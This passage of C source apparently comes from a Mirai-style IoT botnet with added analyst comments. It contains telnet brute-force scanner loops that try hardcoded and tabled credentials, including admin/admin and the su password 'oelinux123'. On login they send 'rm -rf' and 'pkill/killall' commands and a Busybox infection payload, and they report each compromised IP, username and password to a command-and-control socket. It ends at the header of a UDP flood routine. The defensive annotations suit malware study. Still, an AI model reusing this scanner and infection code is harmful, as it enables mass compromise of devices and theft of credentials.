  2165.                 sockprintf(mainCommSock, "[ MIRAI ] Bot Killing. || IP: %s || Port: 23 || Username: %s || Password: %s", get_telstate_host(&fds[i]), Telnet_Usernames[fds[i].usernameInd], Telnet_Passwords[fds[i].passwordInd]);
  2166.                 advance_telstate(&fds[i], 8);
  2167.                 }
  2168.                 break;
                    // State 8: restart the stage timer, send "sh" and "shell" (the results of these two sends
                    // are tested by if statements with empty bodies, so failures are ignored), then send
                    // Busybox_Payload and report to mainCommSock. A reply containing CONNECTED
                    // (case-insensitive) is reported as success; the timeout branch reports failure and
                    // resets the slot.
  2169.             case 8:
  2170.             {      
  2171.                         fds[i].tTimeout = time(NULL);
  2172.                         if(send(fds[i].fd, "sh\r\n", 4, MSG_NOSIGNAL) < 0);
  2173.                         if(send(fds[i].fd, "shell\r\n", 7, MSG_NOSIGNAL) < 0);
  2174.                         if(send(fds[i].fd, Busybox_Payload, strlen(Busybox_Payload), MSG_NOSIGNAL) < 0) { reset_telstate(&fds[i]);continue; }
  2175.                         sockprintf(mainCommSock, "[ MIRAI ] Sending Infection Payload. || IP: %s || Port: 23 || Username: %s || Password: %s", get_telstate_host(&fds[i]), Mirai_Usernames[fds[i].usernameInd], Mirai_Passwords[fds[i].passwordInd]);
  2176.                         //int read_until_response(int fd, int timeout_usec, char* buffer, int buf_size, char** strings)
  2177.                         if(read_until_response(fds[i].fd, wait_usec, fds[i].sockbuf, SOCKBUF_SIZE, "connected"))
  2178.                         {
  2179.                             //char  strcasestr (const char *big, const char *little)
  2180.                             if(strcasestr(fds[i].sockbuf, "CONNECTED") && fds[i].complete != 3)
  2181.                             {
  2182.                                 sockprintf(mainCommSock, "[ MIRAI ] Infection Success. || IP: %s: || Port: 23 || Username: %s || Password: %s", get_telstate_host(&fds[i]), Mirai_Usernames[fds[i].usernameInd], Mirai_Passwords[fds[i].passwordInd]);
  2183.                             }
  2184.                         }
                                // The comparison uses the tTimeout value assigned at the top of this case.
  2185.                         if(fds[i].tTimeout + 60 < time(NULL))
  2186.                         {  
  2187.                             if(fds[i].complete!=3)
  2188.                             {
  2189.                                 sockprintf(mainCommSock, "[ MIRAI ] Infection Failed. || IP: %s || Port: 23 || Username: %s || Password: %s", get_telstate_host(&fds[i]), Mirai_Usernames[fds[i].usernameInd], Mirai_Passwords[fds[i].passwordInd]);
  2190.                             }
  2191.                             reset_telstate(&fds[i]);
  2192.                         }
  2193.                 break;
  2194.                 }
  2195.             }
  2196.         }
  2197.     }              
  2198. }
  2199. void PhoneScanner() {
        // Analyst annotation (code unchanged). PhoneScanner is a never-returning loop over
        // 253 slots that runs a telnet (TCP/23) login dialogue with literal strings rather
        // than credential tables. Slot states, as coded below:
        //   0  take an address from PhoneScan() and start a non-blocking connect
        //   1  wait for the connect (10000 usec select, 6 s stage timeout)
        //   2  wait for a reply matching the `phone` table
        //   3  send "admin"            4  wait (`phone`)
        //   5  send "admin"            6  wait (`advances2`)
        //   7  send "rm -rf ...", "pkill -9 ...;killall -9 ...;" and "su"
        //   8  wait (`phone`)          9  send "oelinux123"
        //   10 send phonepayload
        // PhoneScan, rand_cmwc, read_until_response, contains_fail, sclose, reset_telstate,
        // RemoveTempDirs and the strings/tables (phone, advances2, Temp_Directorys,
        // Bot_Killer_Binarys, phonepayload) are defined outside this excerpt.
        // Detection: the sequence admin / admin / su / oelinux123 on one telnet session,
        // followed by the cleanup command strings, is a content signature for this routine.
        // The sockprintf status reports are commented out here, so this function itself
        // writes nothing to mainCommSock.
  2200. int maxfds = 253, i, res, j, valopt;
  2201. int max = maxfds;
        // j, buf, cur_dir and line are declared but not used in this function.
  2202. char buf[128], cur_dir;
  2203. fd_set fdset;
  2204. struct timeval tv;
  2205. socklen_t lon;
  2206. srand(time(NULL) ^ rand_cmwc());
  2207. char line[253];
  2208. char* buffer;
  2209. struct sockaddr_in dest_addr;
  2210. dest_addr.sin_family = AF_INET;
  2211. dest_addr.sin_port = htons(23);
  2212. memset(dest_addr.sin_zero, '\0', sizeof dest_addr.sin_zero);
        // One 254-byte receive buffer is allocated and the same pointer is stored in every slot.
  2213. buffer = malloc(253 + 1);
  2214. memset(buffer, 0, 253 + 1);
  2215. struct telstate_t fds[max];
        // This memset covers max * (sizeof(int) + 1) bytes; each entry is zeroed in full by the loop that follows.
  2216. memset(fds, 0, max * (sizeof(int) + 1));
  2217. for(i = 0; i < max; i++) {
  2218. memset(&(fds[i]), 0, sizeof(struct telstate_t));
  2219. fds[i].complete = 1;
  2220. fds[i].sockbuf = buffer; }
  2221. while(1) {
  2222. for(i = 0; i < max; i++) {
        // tTimeout == 0 means "stage timer not started"; start it now.
  2223. if(fds[i].tTimeout == 0) {
  2224. fds[i].tTimeout = time(NULL); }
        // Inside the switch, `continue` moves on to the next slot of the for loop.
  2225. switch(fds[i].state) {
        // State 0: when complete == 1 the slot is wiped (buffer pointer kept) and given a new
        // address; otherwise the previous address is reused. Then a non-blocking connect starts.
  2226. case 0: {
  2227. if(fds[i].complete == 1) {
  2228. char *tmp = fds[i].sockbuf;
  2229. memset(&(fds[i]), 0, sizeof(struct telstate_t));
  2230. fds[i].sockbuf = tmp;
  2231. fds[i].ip = PhoneScan(); }
  2232. dest_addr.sin_family = AF_INET;
  2233. dest_addr.sin_port = htons(23);
  2234. memset(dest_addr.sin_zero, '\0', sizeof dest_addr.sin_zero);
  2235. dest_addr.sin_addr.s_addr = fds[i].ip;
  2236. fds[i].fd = socket(AF_INET, SOCK_STREAM, 0);
  2237. if(fds[i].fd == -1) continue;
  2238. fcntl(fds[i].fd, F_SETFL, fcntl(fds[i].fd, F_GETFL, NULL) | O_NONBLOCK);
  2239. if(connect(fds[i].fd, (struct sockaddr *)&dest_addr, sizeof(dest_addr)) == -1 && errno != EINPROGRESS) {
  2240. sclose(fds[i].fd);
  2241. fds[i].complete = 1; }
  2242. else {
  2243. fds[i].state = 1;
  2244. fds[i].tTimeout = 0;
  2245. }
  2246. }
  2247. break;
        // State 1: poll for writability, then read SO_ERROR to learn whether the connect succeeded.
  2248. case 1: {
  2249. FD_ZERO(&fdset);
  2250. FD_SET(fds[i].fd, &fdset);
  2251. tv.tv_sec = 0;
  2252. tv.tv_usec = 10000;
  2253. res = select(fds[i].fd+1, NULL, &fdset, NULL, &tv);
  2254. if(res == 1) {
  2255. lon = sizeof(int);
  2256. valopt = 0;
  2257. getsockopt(fds[i].fd, SOL_SOCKET, SO_ERROR, (void*)(&valopt), &lon);
  2258. if(valopt) {
  2259. sclose(fds[i].fd);
  2260. fds[i].state = 0;
  2261. fds[i].complete = 1;
  2262. } else {
        // Connected: back to blocking mode, clear the receive state, restart the stage timer.
  2263. fcntl(fds[i].fd, F_SETFL, fcntl(fds[i].fd, F_GETFL, NULL) & (~O_NONBLOCK));
  2264. fds[i].tTimeout = 0;
  2265. fds[i].bufUsed = 0;
  2266. memset(fds[i].sockbuf, 0, 253);
  2267. fds[i].state = 2;
  2268. } continue; }
  2269. else if(res == -1) {
  2270. sclose(fds[i].fd);
  2271. fds[i].state = 0;
  2272. fds[i].complete = 1;
  2273. continue; }
  2274. if(fds[i].tTimeout + 6 < time(NULL)) {
  2275. sclose(fds[i].fd);
  2276. fds[i].state = 0;
  2277. fds[i].complete = 1;
  2278. }
  2279. }
  2280. break;
        // State 2: wait for the first reply (`phone` table). On a "fail" match the slot returns
        // to state 0 with complete unchanged; on timeout it is marked complete = 1.
  2281. case 2: {
  2282. if(read_until_response(fds[i].fd, 10000, fds[i].sockbuf, 253, phone)) {
  2283. if(contains_fail(fds[i].sockbuf)) {
  2284. fds[i].state = 0;
  2285. } else {
  2286. fds[i].state = 3; }
  2287. continue; }
  2288. if(fds[i].tTimeout + 6 < time(NULL)) {
  2289. fds[i].state = 0;
  2290. fds[i].complete = 1;
  2291. }
  2292. }
  2293. break;
        // State 3: send the literal "admin" plus CRLF (first login field).
  2294. case 3: {
  2295. if(send(fds[i].fd, "admin\r\n", 7, MSG_NOSIGNAL) < 0) {
  2296. fds[i].state = 0;
  2297. fds[i].complete = 1;
  2298. continue; }
  2299. fds[i].state = 4;
  2300. }
  2301. break;
        // State 4: wait for the reply to the first field.
  2302. case 4: {
  2303. if(read_until_response(fds[i].fd, 10000, fds[i].sockbuf, 253, phone)) {
  2304. if(contains_fail(fds[i].sockbuf)) {
  2305. fds[i].state = 0;
  2306. } else {
  2307. fds[i].state = 5; }
  2308. continue; }
  2309. if(fds[i].tTimeout + 6 < time(NULL)) {
  2310. fds[i].state = 0;
  2311. fds[i].complete = 1;
  2312. }
  2313. }
  2314. break;
        // State 5: send the literal "admin" plus CRLF again (second login field).
  2315. case 5: {
  2316. if(send(fds[i].fd, "admin\r\n", 7, MSG_NOSIGNAL) < 0) {
  2317. fds[i].state = 0;
  2318. fds[i].complete = 1;
  2319. continue; }
  2320. fds[i].state = 6; }
  2321. break;
        // State 6: wait for the login result (`advances2` table); any reply that is not a
        // "fail" match moves on to state 7. The status report is commented out.
  2322. case 6: {
  2323. if (read_until_response(fds[i].fd, 10000, fds[i].sockbuf, 253, advances2)) {
  2324. fds[i].tTimeout = time(NULL);
  2325. if (contains_fail(fds[i].sockbuf)) {
  2326. fds[i].state = 0;
  2327. } else {
  2328. //sockprintf(mainCommSock, "[ PHONE ] Successfully Bruted. || IP: %s || Port: 23 || Username: admin || Password: admin", get_telstate_host(&fds[i]), Telnet_Usernames[fds[i].usernameInd], Telnet_Passwords[fds[i].passwordInd]);
  2329. fds[i].state = 7;
  2330. } continue; }
  2331. if (fds[i].tTimeout + 7 < time(NULL)) {
  2332. fds[i].state = 0;
  2333. fds[i].complete = 1;
  2334. }
  2335. }
  2336. break;
        // State 7: two command strings are formatted into 80-byte stack buffers and sent to the
        // logged-in peer ("rm -rf <Temp_Directorys>;" and "pkill -9 <X>;killall -9 <X>;" with
        // X = Bot_Killer_Binarys); RemoveTempDirs() is also called in this process. Then "su"
        // is sent to request a privileged shell. The first two failure paths call
        // reset_telstate(); the "su" failure path sets state and complete directly.
  2337. case 7: {
  2338. char RemoveTheTempDirs [80];
  2339. sprintf(RemoveTheTempDirs, "rm -rf %s;", Temp_Directorys);
  2340. if(send(fds[i].fd, RemoveTheTempDirs, strlen(RemoveTheTempDirs), MSG_NOSIGNAL) < 0) { reset_telstate(&fds[i]);continue; }
  2341. RemoveTempDirs();
  2342. //sockprintf(mainCommSock, "[ PHONE ] Removing Temp Directorys. || IP: %s || Port: 23 || Username: admin || Password: admin", get_telstate_host(&fds[i]), Telnet_Usernames[fds[i].usernameInd], Telnet_Passwords[fds[i].passwordInd]);
  2343. char killtheproccesses[80];
  2344. sprintf(killtheproccesses, "pkill -9 %s;killall -9 %s;", Bot_Killer_Binarys, Bot_Killer_Binarys);
  2345. if(send(fds[i].fd, killtheproccesses, strlen(killtheproccesses), MSG_NOSIGNAL) < 0) { reset_telstate(&fds[i]);continue; }
  2346. //sockprintf(mainCommSock, "[ PHONE ] Bot Killing. || IP: %s || Port: 23 || Username: admin || Password: admin", get_telstate_host(&fds[i]), Telnet_Usernames[fds[i].usernameInd], Telnet_Passwords[fds[i].passwordInd]);
  2347. if(send(fds[i].fd, "su\r\n", 4, MSG_NOSIGNAL) < 0) {
  2348. fds[i].state = 0;
  2349. fds[i].complete = 1;
  2350. continue; }
  2351. fds[i].state = 8;
  2352. }
  2353. break;
        // State 8: wait for the reply to "su" (`phone` table).
  2354. case 8: {
  2355. if(read_until_response(fds[i].fd, 10000, fds[i].sockbuf, 253, phone)) {
  2356. if(contains_fail(fds[i].sockbuf)) {
  2357. fds[i].state = 0;
  2358. } else {
  2359. fds[i].state = 9; }
  2360. continue; }
  2361. if(fds[i].tTimeout + 6 < time(NULL)) {
  2362. fds[i].state = 0;
  2363. fds[i].complete = 1;
  2364. }
  2365. }
  2366. break;
        // State 9: send the literal "oelinux123" plus CRLF in answer to the "su" prompt.
  2367. case 9: {
  2368. if(send(fds[i].fd, "oelinux123\r\n", 12, MSG_NOSIGNAL) < 0) {
  2369. fds[i].state = 0;
  2370. fds[i].complete = 1;
  2371. continue; }
  2372. fds[i].state = 10;
  2373. }
  2374. break;
        // State 10: restart the stage timer and send phonepayload. After a successful send the
        // slot is marked complete = 3. The timeout test that follows compares against the
        // tTimeout value assigned at the top of this case, and its inner if has an empty body.
  2375. case 10: {
  2376. fds[i].tTimeout = time(NULL);
  2377. if(send(fds[i].fd, phonepayload, strlen(phonepayload), MSG_NOSIGNAL) < 0) {
  2378. sclose(fds[i].fd);
  2379. fds[i].state = 0;
  2380. fds[i].complete = 1;
  2381. continue; }
  2382. fds[i].complete = 3;
  2383. if(fds[i].tTimeout + 60 < time(NULL)) {
  2384. if(fds[i].complete !=3){
  2385. }
  2386. fds[i].state = 0;
  2387. fds[i].complete = 1;
  2388. }
  2389. break;
  2390. }
  2391. }
  2392. }
  2393. }
  2394. }
/*
 * HackaShit: Telnet credential-guessing loop over 256 connection slots.
 * processCmd() runs it in a forked child on "TELNETTEST ON".
 *
 * Each slot walks a state machine (fds[i].state 0..8): connect to TCP/23,
 * wait for a prompt, send a username and a password from Telnet_Usernames /
 * Telnet_Passwords (defined elsewhere), and on an accepted login report the
 * host and credentials over mainCommSock before sending shell commands to it.
 * The function never returns; the child is stopped with SIGKILL ("OFF").
 *
 * Analyst notes:
 *  - Network: one host opening many short TCP/23 sessions to unrelated
 *    addresses (findARandomIP() is defined elsewhere).
 *  - C2 channel: the literal strings "[ TELNET ] Successfully Bruted." and
 *    "REPORT <ip>:<user>:<pass>" are sent in clear text on mainCommSock.
 *  - Exposure is removed by disabling Telnet or replacing factory
 *    credentials on the devices being probed.
 */
void HackaShit() {
char buf[128];
     int max = 256, i, res, valopt;
    fd_set fdset;
    struct timeval tv;
    socklen_t lon;
    srand(time(NULL) ^ rand_cmwc());
    struct sockaddr_in dest_addr;
    dest_addr.sin_family = AF_INET;
    dest_addr.sin_port = htons(23);
    memset(dest_addr.sin_zero, '\0', sizeof dest_addr.sin_zero);
    struct telstate_t fds[max];
// This first memset covers only max * (sizeof(int) + 1) bytes; the loop below clears each slot in full.
memset(fds, 0, max * (sizeof(int) + 1));
for(i = 0; i < max; i++) {
memset(&(fds[i]), 0, sizeof(struct telstate_t));
fds[i].complete = 1;
fds[i].sockbuf = malloc(256 + 1); }
while(1) {
for(i = 0; i < max; i++) {
if(fds[i].tTimeout == 0) {
fds[i].tTimeout = time(NULL); }
switch(fds[i].state) {
// State 0: choose a new address (slot finished) or the next credential pair,
// then start a non-blocking connect to port 23.
case 0: {
if(fds[i].complete) {
// Reset the slot but keep its heap buffer.
char *tmp = fds[i].sockbuf;
memset(&(fds[i]), 0, sizeof(struct telstate_t));
fds[i].sockbuf = tmp;
fds[i].ip = findARandomIP(); }
else  {
// Both indexes advance together, so user/password entries are tried as pairs.
fds[i].passwordInd++;
fds[i].usernameInd++;
if(fds[i].passwordInd == sizeof(Telnet_Passwords) / sizeof(char *)) {
fds[i].complete = 1;
continue; }
if(fds[i].usernameInd == sizeof(Telnet_Usernames) / sizeof(char *)) {
fds[i].complete = 1;
continue;
}
}
dest_addr.sin_family = AF_INET;
dest_addr.sin_port = htons(23);
memset(dest_addr.sin_zero, '\0', sizeof dest_addr.sin_zero);
dest_addr.sin_addr.s_addr = fds[i].ip;
fds[i].fd = socket(AF_INET, SOCK_STREAM, 0);
if(fds[i].fd == -1) continue;
fcntl(fds[i].fd, F_SETFL, fcntl(fds[i].fd, F_GETFL, NULL) | O_NONBLOCK);
if(connect(fds[i].fd, (struct sockaddr *)&dest_addr, sizeof(dest_addr)) == -1 && errno != EINPROGRESS) {
sclose(fds[i].fd);
fds[i].complete = 1; }
else {
fds[i].state = 1;
fds[i].tTimeout = 0;
}
}
break;
// State 1: poll for connect completion with a 10 ms select(); SO_ERROR decides
// the outcome. The slot is abandoned once more than 6 s have passed.
case 1: {
FD_ZERO(&fdset);
FD_SET(fds[i].fd, &fdset);
tv.tv_sec = 0;
tv.tv_usec = 10000;
res = select(fds[i].fd+1, NULL, &fdset, NULL, &tv);
if(res == 1) {
lon = sizeof(int);
valopt = 0;
getsockopt(fds[i].fd, SOL_SOCKET, SO_ERROR, (void*)(&valopt), &lon);
if(valopt) {
sclose(fds[i].fd);
fds[i].state = 0;
fds[i].complete = 1;
} else {
// Connected: back to blocking mode, clear the receive buffer.
fcntl(fds[i].fd, F_SETFL, fcntl(fds[i].fd, F_GETFL, NULL) & (~O_NONBLOCK));
fds[i].tTimeout = 0;
fds[i].bufUsed = 0;
memset(fds[i].sockbuf, 0, 256);
fds[i].state = 2;
} continue; }
else if(res == -1) {
sclose(fds[i].fd);
fds[i].state = 0;
fds[i].complete = 1;
continue; }
if(fds[i].tTimeout + 6 < time(NULL)) {
sclose(fds[i].fd);
fds[i].state = 0;
fds[i].complete = 1;
}
}
break;
// State 2: wait for the first prompt. read_until_response(), contains_fail()
// and the `advances` table are defined elsewhere; presumably they match
// prompt and failure strings.
case 2: {
if(read_until_response(fds[i].fd, 10000, fds[i].sockbuf, 256, advances)) {
if(contains_fail(fds[i].sockbuf)) {
fds[i].state = 0;
} else {
fds[i].state = 3; }
continue; }
if(fds[i].tTimeout + 6 < time(NULL)) {
fds[i].state = 0;
fds[i].complete = 1;
}
}
break;
// State 3: send the current username followed by CRLF.
case 3: {
if(send(fds[i].fd, Telnet_Usernames[fds[i].usernameInd], strlen(Telnet_Usernames[fds[i].usernameInd]), MSG_NOSIGNAL) < 0) {
fds[i].state = 0;
fds[i].complete = 1;
continue; }
if(send(fds[i].fd, "\r\n", 2, MSG_NOSIGNAL) < 0) {
fds[i].state = 0;
fds[i].complete = 1;
continue; }
fds[i].state = 4; }
break;
// State 4: wait for the next prompt after the username.
case 4: {
if(read_until_response(fds[i].fd, 10000, fds[i].sockbuf, 256, advances))
{
if(contains_fail(fds[i].sockbuf)) {
fds[i].state = 0;
} else {
fds[i].state = 5; }
continue; }
if(fds[i].tTimeout + 6 < time(NULL)) {
fds[i].state = 0;
fds[i].complete = 1;
}
}
break;
// State 5: send the current password followed by CRLF.
case 5: {
if(send(fds[i].fd, Telnet_Passwords[fds[i].passwordInd], strlen(Telnet_Passwords[fds[i].passwordInd]), MSG_NOSIGNAL) < 0) {
fds[i].state = 0;
fds[i].complete = 1;
continue; }
if(send(fds[i].fd, "\r\n", 2, MSG_NOSIGNAL) < 0) {
fds[i].state = 0;
fds[i].complete = 1;
continue; }
fds[i].state = 6;
}
break;
// State 6: read the post-login response (matched against `advances2`). When
// contains_fail() does not fire, the host and the credential pair are reported
// to the controller twice: a banner line and a "REPORT ip:user:pass" line.
case 6: {
if (read_until_response(fds[i].fd, 10000, fds[i].sockbuf, 256, advances2)) {
fds[i].tTimeout = time(NULL);
if (contains_fail(fds[i].sockbuf)) {
fds[i].state = 0;
} else {
sockprintf(mainCommSock, "[ TELNET ] Successfully Bruted. || IP: %s || Port: 23 || Username: %s || Password: %s", get_telstate_host(&fds[i]), Telnet_Usernames[fds[i].usernameInd], Telnet_Passwords[fds[i].passwordInd]);
sockprintf(mainCommSock, "REPORT %s:%s:%s", get_telstate_host(&fds[i]), Telnet_Usernames[fds[i].usernameInd], Telnet_Passwords[fds[i].passwordInd]);
fds[i].state = 7;
} continue; }
if (fds[i].tTimeout + 6 < time(NULL)) {
fds[i].state = 0;
fds[i].complete = 1;
}
}
break;
// State 7: commands sent to the logged-in device: an "rm -rf" over
// Temp_Directorys, a pkill/killall over Bot_Killer_Binarys, then
// Busybox_Payload (all three defined elsewhere). Both command strings are
// built with unbounded sprintf() into 80-byte stack buffers.
case 7: {
char RemoveTheTempDirs [80];
sprintf(RemoveTheTempDirs, "rm -rf %s;", Temp_Directorys);
if(send(fds[i].fd, RemoveTheTempDirs, strlen(RemoveTheTempDirs), MSG_NOSIGNAL) < 0) { reset_telstate(&fds[i]);continue; }
// RemoveTempDirs() runs system() on the scanning host itself, not on the remote device.
RemoveTempDirs();
sockprintf(mainCommSock, "[ TELNET ] Removing Temp Directorys. || IP: %s || Port: 23 || Username: %s || Password: %s", get_telstate_host(&fds[i]), Telnet_Usernames[fds[i].usernameInd], Telnet_Passwords[fds[i].passwordInd]);
char killtheproccesses[80];
sprintf(killtheproccesses, "pkill -9 %s;killall -9 %s;", Bot_Killer_Binarys, Bot_Killer_Binarys);
if(send(fds[i].fd, killtheproccesses, strlen(killtheproccesses), MSG_NOSIGNAL) < 0) { reset_telstate(&fds[i]);continue; }
sockprintf(mainCommSock, "[ TELNET ] Bot Killing. || IP: %s || Port: 23 || Username: %s || Password: %s", get_telstate_host(&fds[i]), Telnet_Usernames[fds[i].usernameInd], Telnet_Passwords[fds[i].passwordInd]);
if(send(fds[i].fd, Busybox_Payload, strlen(Busybox_Payload), MSG_NOSIGNAL) < 0) {
fds[i].state = 0;
fds[i].complete = 1;
continue; }
fds[i].state = 8;
}
break;
// State 8: sends Busybox_Payload again. tTimeout is refreshed at the top of
// this case, so the 60 s check below cannot be true here and the state is not
// left until send() fails; the same payload string repeats on the session.
case 8: {
fds[i].tTimeout = time(NULL);
if(send(fds[i].fd, Busybox_Payload, strlen(Busybox_Payload), MSG_NOSIGNAL) < 0) {
sclose(fds[i].fd);
fds[i].state = 0;
fds[i].complete = 1;
continue; }
fds[i].complete = 3;
if(fds[i].tTimeout + 60 < time(NULL)) {
if(fds[i].complete !=3){
}
fds[i].state = 0;
fds[i].complete = 1;
}
break;
}
}
}
}
}
/*
 * MiraiHackaShit: Telnet credential-guessing loop over 256 connection slots,
 * run in a forked child by processCmd() on "MIRAITEST ON".
 *
 * The visible code differs from HackaShit() only in where addresses come from
 * (MiraiIPRanges(), defined elsewhere) and in the "[ MIRAI ]" tag of the
 * report strings. The function never returns.
 *
 * Analyst notes:
 *  - Network: bursts of outbound TCP/23 sessions from a single host.
 *  - C2 channel: clear-text "[ MIRAI ] Successfully Bruted." and
 *    "REPORT <ip>:<user>:<pass>" lines on mainCommSock.
 */
void MiraiHackaShit() {
char buf[128];
int max = 256, i, res, valopt;
fd_set fdset;
struct timeval tv;
socklen_t lon;
srand(time(NULL) ^ rand_cmwc());
struct sockaddr_in dest_addr;
dest_addr.sin_family = AF_INET;
dest_addr.sin_port = htons(23);
memset(dest_addr.sin_zero, '\0', sizeof dest_addr.sin_zero);
struct telstate_t fds[max];
// Partial clear only; each slot is zeroed in full by the loop below.
memset(fds, 0, max * (sizeof(int) + 1));
for(i = 0; i < max; i++) {
memset(&(fds[i]), 0, sizeof(struct telstate_t));
fds[i].complete = 1;
fds[i].sockbuf = malloc(256 + 1); }
while(1) {
for(i = 0; i < max; i++) {
if(fds[i].tTimeout == 0) {
fds[i].tTimeout = time(NULL); }
switch(fds[i].state) {
// State 0: new address or next credential pair, then non-blocking connect to port 23.
case 0: {
if(fds[i].complete) {
char *tmp = fds[i].sockbuf;
memset(&(fds[i]), 0, sizeof(struct telstate_t));
fds[i].sockbuf = tmp;
fds[i].ip = MiraiIPRanges(); }
else  {
// Username and password indexes advance in lockstep.
fds[i].passwordInd++;
fds[i].usernameInd++;
if(fds[i].passwordInd == sizeof(Telnet_Passwords) / sizeof(char *)) {
fds[i].complete = 1;
continue; }
if(fds[i].usernameInd == sizeof(Telnet_Usernames) / sizeof(char *)) {
fds[i].complete = 1;
continue;
}
}
dest_addr.sin_family = AF_INET;
dest_addr.sin_port = htons(23);
memset(dest_addr.sin_zero, '\0', sizeof dest_addr.sin_zero);
dest_addr.sin_addr.s_addr = fds[i].ip;
fds[i].fd = socket(AF_INET, SOCK_STREAM, 0);
if(fds[i].fd == -1) continue;
fcntl(fds[i].fd, F_SETFL, fcntl(fds[i].fd, F_GETFL, NULL) | O_NONBLOCK);
if(connect(fds[i].fd, (struct sockaddr *)&dest_addr, sizeof(dest_addr)) == -1 && errno != EINPROGRESS) {
sclose(fds[i].fd);
fds[i].complete = 1; }
else {
fds[i].state = 1;
fds[i].tTimeout = 0;
}
}
break;
// State 1: 10 ms select() for connect completion; abandoned after more than 6 s.
case 1: {
FD_ZERO(&fdset);
FD_SET(fds[i].fd, &fdset);
tv.tv_sec = 0;
tv.tv_usec = 10000;
res = select(fds[i].fd+1, NULL, &fdset, NULL, &tv);
if(res == 1) {
lon = sizeof(int);
valopt = 0;
getsockopt(fds[i].fd, SOL_SOCKET, SO_ERROR, (void*)(&valopt), &lon);
if(valopt) {
sclose(fds[i].fd);
fds[i].state = 0;
fds[i].complete = 1;
} else {
fcntl(fds[i].fd, F_SETFL, fcntl(fds[i].fd, F_GETFL, NULL) & (~O_NONBLOCK));
fds[i].tTimeout = 0;
fds[i].bufUsed = 0;
memset(fds[i].sockbuf, 0, 256);
fds[i].state = 2;
} continue; }
else if(res == -1) {
sclose(fds[i].fd);
fds[i].state = 0;
fds[i].complete = 1;
continue; }
if(fds[i].tTimeout + 6 < time(NULL)) {
sclose(fds[i].fd);
fds[i].state = 0;
fds[i].complete = 1;
}
}
break;
// State 2: wait for the first prompt (helpers and `advances` are defined elsewhere).
case 2: {
if(read_until_response(fds[i].fd, 10000, fds[i].sockbuf, 256, advances)) {
if(contains_fail(fds[i].sockbuf)) {
fds[i].state = 0;
} else {
fds[i].state = 3; }
continue; }
if(fds[i].tTimeout + 6 < time(NULL)) {
fds[i].state = 0;
fds[i].complete = 1;
}
}
break;
// State 3: send username + CRLF.
case 3: {
if(send(fds[i].fd, Telnet_Usernames[fds[i].usernameInd], strlen(Telnet_Usernames[fds[i].usernameInd]), MSG_NOSIGNAL) < 0) {
fds[i].state = 0;
fds[i].complete = 1;
continue; }
if(send(fds[i].fd, "\r\n", 2, MSG_NOSIGNAL) < 0) {
fds[i].state = 0;
fds[i].complete = 1;
continue; }
fds[i].state = 4; }
break;
// State 4: wait for the prompt that follows the username.
case 4: {
if(read_until_response(fds[i].fd, 10000, fds[i].sockbuf, 256, advances))
{
if(contains_fail(fds[i].sockbuf)) {
fds[i].state = 0;
} else {
fds[i].state = 5; }
continue; }
if(fds[i].tTimeout + 6 < time(NULL)) {
fds[i].state = 0;
fds[i].complete = 1;
}
}
break;
// State 5: send password + CRLF.
case 5: {
if(send(fds[i].fd, Telnet_Passwords[fds[i].passwordInd], strlen(Telnet_Passwords[fds[i].passwordInd]), MSG_NOSIGNAL) < 0) {
fds[i].state = 0;
fds[i].complete = 1;
continue; }
if(send(fds[i].fd, "\r\n", 2, MSG_NOSIGNAL) < 0) {
fds[i].state = 0;
fds[i].complete = 1;
continue; }
fds[i].state = 6;
}
break;
// State 6: post-login response; an accepted login is reported to the
// controller as a banner line plus a "REPORT ip:user:pass" line.
case 6: {
if (read_until_response(fds[i].fd, 10000, fds[i].sockbuf, 256, advances2)) {
fds[i].tTimeout = time(NULL);
if (contains_fail(fds[i].sockbuf)) {
fds[i].state = 0;
} else {
sockprintf(mainCommSock, "[ MIRAI ] Successfully Bruted. || IP: %s || Port: 23 || Username: %s || Password: %s", get_telstate_host(&fds[i]), Telnet_Usernames[fds[i].usernameInd], Telnet_Passwords[fds[i].passwordInd]);
sockprintf(mainCommSock, "REPORT %s:%s:%s", get_telstate_host(&fds[i]), Telnet_Usernames[fds[i].usernameInd], Telnet_Passwords[fds[i].passwordInd]);
fds[i].state = 7;
} continue; }
if (fds[i].tTimeout + 6 < time(NULL)) {
fds[i].state = 0;
fds[i].complete = 1;
}
}
break;
// State 7: sends an "rm -rf" over Temp_Directorys, a pkill/killall over
// Bot_Killer_Binarys and then Busybox_Payload to the device. The two command
// strings are built with unbounded sprintf() into 80-byte stack buffers.
case 7: {
char RemoveTheTempDirs [80];
sprintf(RemoveTheTempDirs, "rm -rf %s;", Temp_Directorys);
if(send(fds[i].fd, RemoveTheTempDirs, strlen(RemoveTheTempDirs), MSG_NOSIGNAL) < 0) { reset_telstate(&fds[i]);continue; }
// Local call: wipes directories on the scanning host via system().
RemoveTempDirs();
sockprintf(mainCommSock, "[ MIRAI ] Removing Temp Directorys. || IP: %s || Port: 23 || Username: %s || Password: %s", get_telstate_host(&fds[i]), Telnet_Usernames[fds[i].usernameInd], Telnet_Passwords[fds[i].passwordInd]);
char killtheproccesses[80];
sprintf(killtheproccesses, "pkill -9 %s;killall -9 %s;", Bot_Killer_Binarys, Bot_Killer_Binarys);
if(send(fds[i].fd, killtheproccesses, strlen(killtheproccesses), MSG_NOSIGNAL) < 0) { reset_telstate(&fds[i]);continue; }
sockprintf(mainCommSock, "[ MIRAI ] Bot Killing. || IP: %s || Port: 23 || Username: %s || Password: %s", get_telstate_host(&fds[i]), Telnet_Usernames[fds[i].usernameInd], Telnet_Passwords[fds[i].passwordInd]);
if(send(fds[i].fd, Busybox_Payload, strlen(Busybox_Payload), MSG_NOSIGNAL) < 0) {
fds[i].state = 0;
fds[i].complete = 1;
continue; }
fds[i].state = 8;
}
break;
// State 8: re-sends Busybox_Payload. Because tTimeout is refreshed first, the
// 60 s check cannot be true here; the state is left only when send() fails.
case 8: {
fds[i].tTimeout = time(NULL);
if(send(fds[i].fd, Busybox_Payload, strlen(Busybox_Payload), MSG_NOSIGNAL) < 0) {
sclose(fds[i].fd);
fds[i].state = 0;
fds[i].complete = 1;
continue; }
fds[i].complete = 3;
if(fds[i].tTimeout + 60 < time(NULL)) {
if(fds[i].complete !=3){
}
fds[i].state = 0;
fds[i].complete = 1;
}
break;
}
}
}
}
}
/*
 * SendSTD: UDP flood routine behind the "STD" command; processCmd() calls it
 * in a forked child, which ends itself with _exit(0) after `secs` seconds.
 *
 * ip   - host name or address, resolved with gethostbyname() (the result is
 *        not checked for NULL before use).
 * port - stored into sin_port as given, without htons().
 * secs - run time in seconds.
 *
 * Analyst notes (traffic characteristics visible in the code):
 *  - Every datagram is 69 bytes taken from the address of the 4-byte literal
 *    "std", so the payload starts with "std\0" followed by whatever bytes sit
